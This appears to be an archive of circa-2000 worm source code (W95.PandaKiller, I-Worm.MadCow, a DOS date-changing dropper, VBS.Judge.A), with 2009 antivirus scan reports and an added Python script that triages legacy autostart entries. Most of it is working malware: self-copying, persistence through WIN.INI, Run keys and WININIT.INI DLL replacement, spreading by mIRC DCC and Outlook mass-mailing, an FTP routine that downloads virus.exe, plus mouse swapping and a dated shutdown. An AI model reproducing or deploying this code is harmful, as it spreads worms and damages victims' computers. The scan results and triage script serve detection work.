Copie db "\WinExec.exe",00h
Wsk1 db "\WSOCK32.DLL",00h
Wsk2 db "\WSOCK32.TPK",00h
Wininit db "\\WININIT.INI",00h
windows db "windows",00h
run db "run",00h
Winini db "\\WIN.INI",00h
nul db "NUL",00h
rename db "Rename",00h
ini db "C:\script.tpk",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
script3 db "C:\program files\mirc\script.ini",00h
script4 db "C:\program files\mirc32\script.ini",00h
CLE db "Software\[PandaKiller]",00h
TITRE db "Error Loader",00h
TEXTE db "Windows NT required !",0dh,0ah
db "This program will be terminated",00h
inid db "[script]",0dh,0ah
db "n0=on 1:start:{",0dh,0ah
db "n1=.remote on",0dh,0ah
db "n2=.ctcps on",0dh,0ah
db "n3= .events on",0dh,0ah
db "n4=}",0dh,0ah
db "n5=on 1:join:#:{",0dh,0ah
db "n6= if ( $nick == $me ) { halt } | .dcc "
db "send $nick C:\Windows\WinExec.exe",0dh,0ah
db "n7=}",0dh,0ah
initaille equ $-inid
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wsecond WORD ?
wMilliseconds WORD ?
SYSTIME ends
SystemTime SYSTIME <>
.code
DEBUT: mov eax, offset CLE ; Check whether a [PandaKiller] key
call REG ; exists in HKLM\Software.
cmp [regDisp],1 ; If it was not there already,
jne FICHIER ; install the components
WCOPIE: push 0 ;
call GetModuleHandleA ;
push 260 ; The program copies itself into
push offset szOrig ;
push eax ;
call GetModuleFileNameA ; the computer's WINDOWS folder
push 260 ;
push offset szCopie ; under the name WinExec.exe
call GetWindowsDirectoryA ;
push offset Copie ;
push offset szCopie ;
call lstrcat ;
push 0 ;
push offset szCopie ;
push offset szOrig ;
call CopyFileA ;

WIN_INI:push 260 ; Put a line in the WIN.INI file so
push offset szWin2 ; that the program starts at every
call GetWindowsDirectoryA ; boot.
push offset Winini ; This avoids using the REGISTRY,
push offset szWin2 ; which is too conspicuous.
call lstrcat ;
push offset szWin2 ; In WIN.INI in the WINDOWS folder:
push offset szCopie ; "program name"
push offset run ; run=
push offset windows ; [windows]
call WritePrivateProfileStringA ;

WSOCK32:push 260 ;
push offset szWsk1 ; Here the file WSOCK32.DLL from the
call GetSystemDirectoryA ; SYSTEM directory is copied
push 260 ;
push offset szWsk2 ; to WSOCK32.TPK in the same
call GetSystemDirectoryA ; SYSTEM directory
push offset Wsk1 ;
push offset szWsk1 ;
call lstrcat ;
push offset Wsk2 ;
push offset szWsk2 ;
call lstrcat ;
push 0 ;
push offset szWsk2 ;
push offset szWsk1 ;
call CopyFileA ;
WININIT:push 260 ; So that the computer uses the
push offset szWin ; new WSOCK32.TPK file, we write
call GetWindowsDirectoryA ; into the WININIT.INI file in the
push offset Wininit ; WINDOWS directory.
push offset szWin ; The routine is simple:
call lstrcat ;
push offset szWin ;
push offset szWsk1 ;
push offset nul ;
push offset rename ; [Rename]
call WritePrivateProfileStringA ; NUL=%system%\WSOCK32.DLL
push offset szWin ;
push offset szWsk2 ;
push offset szWsk1 ;
push offset rename ;
call WritePrivateProfileStringA ; %sys%\WSOCK32.DLL=%sys%\WSOCK32.TPK
jmp FICHIER

REG: push offset regDisp ;
push offset regResu ;
push 0 ; default security descriptor
push 0F003FH ; KEY_ALL_ACCESS
push 0 ;
push 0 ;
push 0 ;
push eax ; address of the subkey name
push 80000002h ; HKEY_LOCAL_MACHINE
call RegCreateKeyExA ;
SUITE: push [regResu] ;
call RegCloseKey ;
ret

FICHIER:push 00000000h ; Here is one of the most convenient
push 00000080h ; ways of sending our program
push 00000002h ; all over the place:
push 00000000h ;
push 00000001h ; mIRC.
push 40000000h ;
push offset ini ; Using a script, mIRC will
call CreateFileA ; automatically send our program
mov [fh],eax ; to everyone who is in the
push 00h ; victim's CHANNEL.
push offset octets ;
push initaille ; To do this, the script is written
push offset inid ; into the C:\ folder
push [fh] ;
call WriteFile ;
push [fh] ;
call CloseHandle ;

COPIE: push 00000000h ; Then it is copied into the
push offset script1 ; following folders:
push offset ini ;
call CopyFileA ; C:\mirc
push 00000000h ;
push offset script2 ;
push offset ini ;
call CopyFileA ; C:\mirc32
push 00000000h ;
push offset script3 ;
push offset ini ;
call CopyFileA ; C:\program files\mirc
push 00000000h ;
push offset script4 ;
push offset ini ;
call CopyFileA ; C:\program files\mirc32
push 00h ;
push offset ini ;
call DeleteFileA ; Then the original is deleted.

ATTEND: push 60 * 1 * 1000 ;
call Sleep ; Pause for 1 minute.

SOURIS: push 01h ;
call SwapMouseButton ; Swap the mouse buttons.

HEURE2: push offset SystemTime ;
call GetSystemTime ; Read the system date.
cmp [SystemTime.wYear],7D1h ; If the year is not 2001,
jne ALERT ; jump to the ALERT label
ETEIND: push 01h ;
call ExitWindowsEx ; Otherwise shut the computer down.
ALERT: push 10h ;
push offset TITRE ; Show the fake error message.
push offset TEXTE ;
push 0 ;
call MessageBoxA ;
FIN: push 0 ;
call ExitProcess ; End of program
end DEBUT
File W95PK.exe received on 05.16.2009 10:42:08 (CET)

Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 -
AhnLab-V3 5.0.0.2 2009.05.15 -
AntiVir 7.9.0.168 2009.05.15 HEUR/Malware
Antiy-AVL 2.0.3.1 2009.05.15 -
Authentium 5.1.2.4 2009.05.15 -
Avast 4.8.1335.0 2009.05.15 -
AVG 8.5.0.336 2009.05.15 IRC/Generic.dropper
BitDefender 7.2 2009.05.16 BehavesLike:Win32.IRC-Worm
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 W32.Ultratt.gz
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 BACKDOOR.Trojan
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 -
F-Prot 4.4.4.56 2009.05.15 -
F-Secure 8.0.14470.0 2009.05.15 W32/P2PWorm
Fortinet 3.117.0.0 2009.05.16 -
GData 19 2009.05.16 BehavesLike:Win32.IRC-Worm
Ikarus T3.1.1.49.0 2009.05.16 -
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 IRC-Worm.DOS.Generic
McAfee 5616 2009.05.15 New Malware.b
McAfee+Artemis 5616 2009.05.15 New Malware.b
McAfee-GW-Edition 6.7.6 2009.05.15 Heuristic.Malware
Microsoft 1.4602 2009.05.16 -
NOD32 4080 2009.05.15 probably unknown NewHeur_PE
Norman 6.01.05 2009.05.16 W32/P2PWorm
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.15 -
PCTools 4.4.2.0 2009.05.15 IRC.Buffy.C
Prevx 3.0 2009.05.16 -
Rising 21.29.51.00 2009.05.16 -
Sophos 4.41.0 2009.05.16 -
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 Possible_Virus
VBA32 3.12.10.5 2009.05.16 -
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 IRC.Buffy.C

Additional information
File size: 8192 bytes
MD5...: f7b2facb5e2c9e5870065004446a8867
SHA1..: 837ce36b596ffab1af92ac1c63506fa613e16e6c
comment * ///// I-Worm.MadCow by PetiK ///// 25/11/2000

To assemble: tasm32 /M /ML madcow.asm
tlink32 -Tpe -aa -x madcow.obj,,,import32.lib *

jumps
locals
.386
.model flat,stdcall
;KERNEL32.dll
extrn lstrcat:PROC
extrn WritePrivateProfileStringA:PROC
extrn CloseHandle:PROC
extrn CopyFileA:PROC
extrn CreateDirectoryA:PROC
extrn CreateFileA:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn GetModuleFileNameA:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
extrn MoveFileA:PROC
extrn WinExec:PROC
extrn WriteFile:PROC

;ADVAPI32.dll
extrn RegSetValueExA:PROC
extrn RegCreateKeyExA:PROC
extrn RegCloseKey:PROC

.data
regDisp dd 0
regResu dd 0
l dd 0
p dd 0
fh dd 0
octets dd ?
szOrig db 260 dup (0)
szOrig2 db 260 dup (0)
szCopie db 260 dup (0)
szCopi2 db 260 dup (0)
szCico db 260 dup (0)
szWin db 260 dup (0)
Dossier db "C:\Win32",00h
fichier db "C:\Win32\Salut.ico",00h
Copico db "\MSLS.ICO",00h
Copie db "\Wininet32.exe",00h
Copie2 db "\MadCow.exe",00h
BATFILE db "C:\Win32\ENVOIE.BAT",00h
VBSFILE db "C:\Win32\ENVOIE.VBS",00h
Winini db "\\WIN.INI",00h
run db "run",00h
windows db "windows",00h
fileini db "C:\Win32\script.ini",00h
Copie3 db "C:\Win32\MadCow.exe",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
script3 db "C:\program files\mirc\script.ini",00h
script4 db "C:\program files\mirc32\script.ini",00h
CLE db "Software\[Atchoum]",00h
CLE2 db "\exefile\DefaultIcon",00h
Signature db "IWorm.MadCow par PetiK (c)2000"

vbsd:
db 'DEBUT()',0dh,0ah
db 'Sub DEBUT()',0dh,0ah
db 'EMAIL()',0dh,0ah
db 'End Sub',0dh,0ah
db '',0dh,0ah
db 'Sub EMAIL()',0dh,0ah
db 'Set K = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'Set N = K.CreateItem(0)',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'If O = 1 Then',0dh,0ah
db 'N.BCC = P.Address',0dh,0ah
db 'Else',0dh,0ah
db 'N.BCC = N.BCC & "; " & P.Address',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'N.Subject = "Pourquoi les vaches sont-elles folles ?"',0dh,0ah
db 'N.Body = "Voila un rapport expliquant la folie des vaches"',0dh,0ah
db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"MadCow.exe")',0dh,0ah
db 'N.Send',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End Sub',0dh,0ah
vbstaille equ $-vbsd

batd:
db '@echo off',0dh,0ah
db 'start C:\Win32\ENVOIE.VBS',0dh,0ah
battaille equ $-batd
inid:
db "[script]",0dh,0ah
db "n0=on 1:JOIN:#:{",0dh,0ah
db "n1= /if ( $nick == $me ) { halt }",0dh,0ah
db "n2= /.dcc send $nick C:\Win32\MadCow.exe",0dh,0ah
db "n3=}",00h
initaille equ $-inid

include icone.inc

.code
DEBUT:
VERIF: mov eax,offset CLE ; Check whether an [Atchoum] key
call REG ; exists in HKLM\Software.
cmp [regDisp],1 ; If it was not there already,
jne INIFILE ; install the components

COPIE: push 0 ;
call GetModuleHandleA ;
push 260 ;
push offset szOrig ;
push eax ;
call GetModuleFileNameA ; Copy the original file
push 260 ;
push offset szCopie ;
call GetSystemDirectoryA ; into the SYSTEM folder
push offset Copie ;
push offset szCopie ;
call lstrcat ; under the name Wininet32.exe
push 00h ;
push offset szCopie ;
push offset szOrig ;
call CopyFileA ;
push 260 ; then
push offset szCopi2 ;
call GetWindowsDirectoryA ; again into the WINDOWS folder
push offset Copie2 ;
push offset szCopi2 ;
call lstrcat ; under the name MadCow.exe
push 00h ;
push offset szCopi2 ;
push offset szOrig ;
call CopyFileA ;

WIN_INI:push 260 ; To launch the program we can
push offset szWin ;
call GetWindowsDirectoryA ; use the registry or the WIN.INI
push offset Winini ;
push offset szWin ; file in the WINDOWS folder.
call lstrcat ;
push offset szWin ; The approach is simple:
push offset szCopie ; [windows]
push offset run ; run="program name"
push offset windows ;
call WritePrivateProfileStringA ;
DIR: push 00h ; Create C:\Win32 here
push offset Dossier ;
call CreateDirectoryA ;
EMAIL: push 00000000h ; Create C:\Win32\ENVOIE.VBS
push 00000080h ;
push 00000002h ;
push 00000000h ;
push 00000001h ;
push 40000000h ;
push offset VBSFILE ;
call CreateFileA ;
mov [fh],eax ;
push 00h ;
push offset octets ;
push vbstaille ;
push offset vbsd ;
push [fh] ;
call WriteFile ;
push [fh] ;
call CloseHandle ;
EXEC: push 00000000h ; and C:\Win32\ENVOIE.BAT,
push 00000080h ;
push 00000002h ; which will run ENVOIE.VBS
push 00000000h ;
push 00000001h ;
push 40000000h ;
push offset BATFILE ;
call CreateFileA ;
mov [fh],eax ;
push 00h ;
push offset octets ;
push battaille ;
push offset batd ;
push [fh] ;
call WriteFile ;
push [fh] ;
call CloseHandle ;
jmp EXECBAT ;

REG: push offset regDisp ;
push offset regResu ;
push 0 ;
push 0F003Fh ;
push 0 ;
push 0 ;
push 0 ;
push eax ; Software\[Atchoum]
push 80000002h ; HKEY_LOCAL_MACHINE
call RegCreateKeyExA ;
push [regResu] ; the key handle is in regResu
call RegCloseKey ;
ret ;

INIFILE:push 00000000h ; Create the file script.ini
push 00000001h ;
push 00000002h ; in C:\Win32
push 00000000h ;
push 00000001h ; as read-only.
push 40000000h ;
push offset fileini ;
call CreateFileA ;
mov [fh],eax ;
push 00h ;
push offset octets ;
push initaille ;
push offset inid ;
push [fh] ;
call WriteFile ;
push [fh] ;
call CloseHandle ;

push 00h ; Copy this file into the
push offset script1 ; following directories:
push offset fileini ;
call CopyFileA ; C:\mirc C:\mirc32
test eax,eax ; C:\program files\mirc and
jnz COPYWIN ; C:\program files\mirc32
push 00h ;
push offset script2 ; If it manages to copy into one
push offset fileini ; of these files, it creates a
call CopyFileA ; copy of the program in C:\Win32
test eax,eax ; under the name MadCow.exe
jnz COPYWIN ;
push 00h ;
push offset script3 ;
push offset fileini ;
call CopyFileA ;
test eax,eax ;
jnz COPYWIN ;
push 00h ;
push offset script4 ;
push offset fileini ;
call CopyFileA ;
test eax,eax ;
jz ICOFILE ;

COPYWIN:push 0 ;
call GetModuleHandleA ;
push 260 ;
push offset szOrig2 ;
push eax ;
call GetModuleFileNameA ; Copy the original file
push 00h ;
push offset Copie3 ;
push offset szOrig2 ;
call CopyFileA ;
jmp FIN ;

ICOFILE:push 00000000h ; Create the file Salut.ico
push 00000080h ;
push 00000002h ; in C:\Win32
push 00000000h ;
push 00000001h ;
push 40000000h ;
push offset fichier ;
call CreateFileA ;
mov [fh],eax ;
push 00h ;
push offset octets ;
push icotaille ;
push offset icod ;
push [fh] ;
call WriteFile ;
push [fh] ;
call CloseHandle ;
push 260 ; Move the file Salut.ico
push offset szCico ;
call GetSystemDirectoryA ; into the SYSTEM folder as
push offset Copico ;
push offset szCico ; MSLS.ICO
call lstrcat ;
push offset szCico ;
push offset fichier ;
call MoveFileA ; => done

REG2: push offset l ;
push offset p ;
push 0 ;
push 1F0000h + 1 + 2h ;
push 0 ;
push 0 ;
push 0 ;
push offset CLE2 ; exefile\DefaultIcon
push 80000000h ; HKEY_CLASSES_ROOT
call RegCreateKeyExA ;
push 05h ;
push offset szCico ; %system%\MSLS.ico
push 01h ;
push 0 ;
push 00h ; DEFAULT VALUE
push p ;
call RegSetValueExA ; CREATE A VALUE
push 0 ;
call RegCloseKey ; CLOSE THE REGISTRY KEY
jmp FIN ; THEN END THE PROGRAM
EXECBAT:push 01h ; Run the file ENVOIE.BAT
push offset BATFILE ;
call WinExec ;
FIN: push 00h ; END OF PROGRAM
call ExitProcess ;

end DEBUT
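
Across the samples above the persistence sits in places older than the Run key most tooling looks at first: PandaKiller.B and .C add Run values (one of them `rundll32 mouse,disable`), W95/98.PandaKiller writes `run=` into WIN.INI and uses the [Rename] section of WININIT.INI to replace WSOCK32.DLL at the next boot, and MadCow both writes WIN.INI and redirects HKCR\exefile\DefaultIcon. As an added example, not from this archive, the following triage script parses those artifacts offline and reports the entries a responder should look at; every input is constructed, the rules and their wording are the example's own, and Run-key values are passed in as a list rather than read from a live registry.

```python
"""Triage of legacy Windows autostart artifacts.

Added example, not part of the original archive.  Parses WIN.INI and
WININIT.INI text plus a list of Run-key values and a DefaultIcon value,
and returns (source, entry, reason) findings.  All inputs are constructed.
"""
import re

SAMPLE_WIN_INI = """\
[windows]
load=
run=C:\\WINDOWS\\WinExec.exe
[Desktop]
Wallpaper=(None)
"""

SAMPLE_WININIT_INI = """\
[Rename]
NUL=C:\\WINDOWS\\SYSTEM\\WSOCK32.DLL
C:\\WINDOWS\\SYSTEM\\WSOCK32.DLL=C:\\WINDOWS\\SYSTEM\\WSOCK32.TPK
"""

# (value name, data) pairs as read from a Run key; constructed.
SAMPLE_RUN_VALUES = [
    ("SystemTray", "SysTray.Exe"),
    ("Stop1", "rundll32 mouse,disable"),
    ("killcih", "C:\\Win\\kill_cih.exe"),
]

# Data of HKCR\exefile\DefaultIcon; "%1" means "use the exe's own icon".
SAMPLE_DEFAULT_ICON = "C:\\WINDOWS\\SYSTEM\\MSLS.ICO"

RUN_RULES = [
    (re.compile(r"rundll32(?:\.exe)?\s+(?:mouse|keyboard)\s*,\s*disable", re.I),
     "input device disabled through rundll32"),
    (re.compile(r'^"?[a-z]:\\win[a-z0-9]*\\[^\\]+\.exe\b', re.I),
     "executable placed directly in a Windows directory root"),
]


def parse_ini(text):
    """Return (section, key, value) triples, keeping duplicate keys in order."""
    entries, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
        elif "=" in line:
            key, _, value = line.partition("=")
            entries.append((section, key.strip(), value.strip()))
    return entries


def check_win_ini(text):
    """[windows] run= and load= start programs at logon on Win9x."""
    return [("win.ini", f"[windows] {key}={value}", "legacy autostart entry")
            for section, key, value in parse_ini(text)
            if section == "windows" and key.lower() in ("run", "load") and value]


def check_wininit_ini(text):
    """[Rename] entries are applied by WININIT.EXE before the shell loads."""
    findings = []
    for section, key, value in parse_ini(text):
        if section != "rename":
            continue
        if key.upper() == "NUL":
            findings.append(("wininit.ini", f"NUL={value}",
                             "file scheduled for deletion at next boot"))
        elif key.lower().endswith(".dll") and not value.lower().endswith(".dll"):
            findings.append(("wininit.ini", f"{key}={value}",
                             "DLL replaced at next boot by a file with a non-DLL name"))
    return findings


def check_run_values(values):
    """Apply RUN_RULES to (name, data) pairs from a Run key."""
    return [("run key", f"{name}={data}", reason)
            for name, data in values
            for rule, reason in RUN_RULES if rule.search(data)]


def check_default_icon(data):
    """exefile\\DefaultIcon is normally "%1"; anything else was set by software."""
    if data.strip().strip('"') == "%1":
        return []
    return [("HKCR\\exefile\\DefaultIcon", data, "default icon for all .exe files redirected")]


def triage(win_ini=SAMPLE_WIN_INI, wininit_ini=SAMPLE_WININIT_INI,
           run_values=SAMPLE_RUN_VALUES, default_icon=SAMPLE_DEFAULT_ICON):
    """Collect every finding as (source, entry, reason)."""
    return (check_win_ini(win_ini) + check_wininit_ini(wininit_ini)
            + check_run_values(run_values) + check_default_icon(default_icon))


if __name__ == "__main__":
    for source, entry, reason in triage():
        print(f"{source:28} {reason}: {entry}")
```

The WININIT.INI check is deliberately narrow: a [Rename] line whose key is NUL deletes a file, and a line that replaces a .dll with a file of another extension is the pattern this sample uses to swap WSOCK32.DLL; legitimate installers normally rename .tmp files into place, so both shapes are worth a look rather than automatic verdicts.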
File MadCow.exe received on 05.16.2009 17:51:57 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/PetTick.worm.8192
AntiVir 7.9.0.168 2009.05.15 Worm/Petik
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Petik.E
Avast 4.8.1335.0 2009.05.15 IRC:Generic-008
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.Malware.IM.5B177226
CAT-QuickHeal 10.00 2009.05.15 W32.Petik.A
ClamAV 0.94.1 2009.05.16 Worm.Madcow
Comodo 1157 2009.05.08 Worm.Win32.Petik.Z
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.8192.B/C
F-Prot 4.4.4.56 2009.05.16 W32/Petik.E
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/Petik.E@mm
GData 19 2009.05.16 Generic.Malware.IM.5B177226
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick@mm
NOD32 4080 2009.05.15 Win32/Petik.Z
Norman 6.01.05 2009.05.16 W32/Pet_Tick.8192.D
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 W32/Petik.A
PCTools 4.4.2.0 2009.05.16 VBS.LoveLetter
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.x
Sophos 4.41.0 2009.05.16 W32/Petik-A
Sunbelt 3.2.1858.2 2009.05.16 Email-Worm.Win32.Petik
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/PetTick@MM
TrendMicro 8.950.0.1092 2009.05.15 WORM_PETIK.E
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.8192
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 VBS.LoveLetter

Additional information
File size: 8192 bytes
MD5...: 15b037d0d23a915fb0a78961cdc7299a
SHA1..: 85864e397e3fee261bdcb62b477a71e936db39f6
;By M.Xxxxxxx XXXXXXX (c)2000
;SIZE: 1034 BYTES
;DWARF4 SETS THE DATE TO 26 DECEMBER 1999
;C:\DWARF.VBS, WHICH ADDS A KEY TO THE REGISTRY
;C:\WINDOWS\DWARF.BAT, WHICH SHOWS A MESSAGE AT EVERY STARTUP

.model small
.code
org 100h

DATE: mov ah,2Bh
mov dh,12
mov dl,26
mov cx,1999
int 21h ;26 DECEMBER 1999
HEURE: mov ah,2Dh
xor cx,cx
xor dx,dx
int 21h ;MIDNIGHT
FILE1: mov ah,3Ch
xor cx,cx
mov dx,offset NOM1
int 21h ;create the 1st file
xchg ax,bx
mov ah,40h
mov cx,progl1
mov dx,offset prog1
int 21h ;write
mov ah,3Eh
int 21h ;close
FILE2: mov ah,3Ch
xor cx,cx
mov dx,offset NOM2
int 21h ;create the 2nd file
xchg ax,bx
mov ah,40h
mov cx,progl2
mov dx,offset prog2
int 21h ;write
mov ah,3Eh
int 21h ;close
MESSAGE: mov ax,3
int 10h
mov ah,9
lea dx,msg
int 21h
FIN: mov ah,4Ch
int 21h

NOM1 db 'c:\dwarf.vbs',0
NOM2 db 'c:\WINDOWS\Panda.bat',0
prog1 db 'rem DwArF.vbs by Panda (c)2000',0Dh,0Ah
db 'msgbox "BONNO JOURNEE ?"',0Dh,0Ah
db 'Dim W',0Dh,0Ah
db 'Set W = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah
db 'W.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows'
db '\CurrentVersion\Run\DwArF", "C:\WINDOWS\dwarf.bat"'
progl1 equ $-prog1
prog2 db '@echo off',0Dh,0Ah
db 'if exist c:\dwarf.vbs del c:\dwarf.vbs',0Dh,0Ah
db 'cls',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo UNE BOMBE A ETE PLACE DANS TON ORDINATEUR',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo DANS 5 SECONDES TU VAS MOURIR',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'choice /c:Q /t:Q,5 /n Le compte à rebours a commencé',0Dh,0Ah
db 'if errorlevel 1 goto Die',0Dh,0Ah
db ':Die',0Dh,0Ah
db 'cls',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo *** *** *** * *',0Dh,0Ah
db 'echo * * * * * * ** **',0Dh,0Ah
db 'echo * * * * * * * * *',0Dh,0Ah
db 'echo * * * * * * * *',0Dh,0Ah
db 'echo * * * * * * * *',0Dh,0Ah
db 'echo * * * * * * * *',0Dh,0Ah
db 'echo *** *** *** * *',0Dh,0Ah
progl2 equ $-prog2
CORBEILLE db 'C:\RECYCLED\*.*',0
msg db 7,7,7,10,13,'UN FICHIER A ETE CREE',0Ah,0Ah,0Dh
db 'IL SE NOMME C:\dwarf.vbs',10,10,13
db 'OUVRE LE VITE $'

end DATE
' Name : VBS.Judge.A
' Author : PetiK
' Language : VBS
' Date : 08/12/2000

' Copies itself to %windir%\WinGDI.EXE.vbs and C:\Judge.TXT.vbs
' Adds to HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\
' WinGDI = %windir%\WinGDI.EXE.vbs
' EMAIL function: scans the address book contacts and sends a mail with a copy of itself.
' VBS.Judge.A by PetiK (c)2000

Dim fso,ws,file
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
Set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbs = file.ReadAll

DEBUT()
Sub DEBUT()
Set win = fso.GetSpecialFolder(0)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(win&"\WinGDI.EXE.vbs")
c.Copy("C:\Judge.TXT.vbs")
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\WinGDI",win&"\WinGDI.EXE.vbs"
EMAIL()
'FTP()
'AUTOEXEC()
TXT()
End Sub

Sub EMAIL()
If Not fso.FileExists("C:\Judge.txt") Then
Set OApp = CreateObject("Outlook.Application")
if oapp="Outlook" then
Set Mapi = OApp.GetNameSpace("MAPI")
For Each AddList In Mapi.AddressLists
If AddList.AddressEntries.Count <> 0 Then
For AddListCount = 1 To AddList.AddressEntries.Count
Set AddListEntry = AddList.AddressEntries(AddListCount)
Set msg = OApp.CreateItem(0)
msg.To = AddListEntry.Address
msg.Subject = "BatMan, SpiderMan et les autres"
msg.Body = "La vraie histoire de ces justiciers"
msg.Attachments.Add "C:\Judge.TXT.vbs"
msg.DeleteAfterSubmit = True
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
end if
End If
End Sub

Sub FTP()
If Not fso.FileExists("C:\Judge.txt") Then
Set bat = fso.CreateTextFile(win&"\FTP.bat")
bat.WriteLine "@echo off"
bat.WriteLine "start ftp -i -v -s:C:\FTP.drv"
bat.close
Set drv = fso.CreateTextFile("C:\FTP.drv")
drv.WriteLine "open"
drv.WriteLine "members.aol.com"
drv.WriteLine "pentasm99"
drv.WriteLine "binary"
drv.WriteLine "lcd C:\"
drv.WriteLine "get virus.exe"
drv.WriteLine "bye"
drv.WriteLine "exit"
drv.close
ws.Run (win&"\FTP.bat")
End If
End Sub

Sub AUTOEXEC()
If Day(Now) = 1 then
Set FileObj = CreateObject("Scripting.FileSystemObject")
file = "c:\autoexec.bat"
Set InStream= FileObj.OpenTextFile (file, 1, False, False)
TLine = Instream.Readall
Set autobat= FileObj.CreateTextFile (file, True, False)
autobat.write(tline)
autobat.WriteBlankLines(1)
autobat.WriteLine "@echo off"
autobat.WriteLine "cls"
autobat.WriteLine "echo."
autobat.WriteLine "echo."
autobat.WriteLine "echo VBS.Judge.A par PetiK (c)2000"
autobat.WriteLine "echo."
autobat.WriteLine "echo TON ORDINATEUR VIENT DE MOURIR"
autobat.WriteLine "pause"
End If
End Sub
Sub TXT()
Set ptk = fso.CreateTextFile("C:\Judge.txt")
ptk.WriteLine "Si vous lisez ce texte,"
ptk.WriteLine "c'est que Microsoft a encors fait des siennes"
ptk.Close
Set mp3 = fso.OpenTextFile("C:\Salut.mp3",2,true)
mp3.Write vbs
mp3.close
End Sub
File Judge.TXT.vbs received on 05.16.2009 17:42:50 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 VBS/Anjulie
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.AV.03
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 VBS/Petik.L@mm
Avast 4.8.1335.0 2009.05.15 VBS:MailWorm-gen
AVG 8.5.0.336 2009.05.15 VBS/VBSWG
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.A9DC8F67
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.16 Worm.VBS-14
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 VBS.Petik
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 VBS/Buggy
F-Prot 4.4.4.56 2009.05.16 VBS/Petik.L@mm
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 VBS/Judge.A
GData 19 2009.05.16 Generic.ScriptWorm.A9DC8F67
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
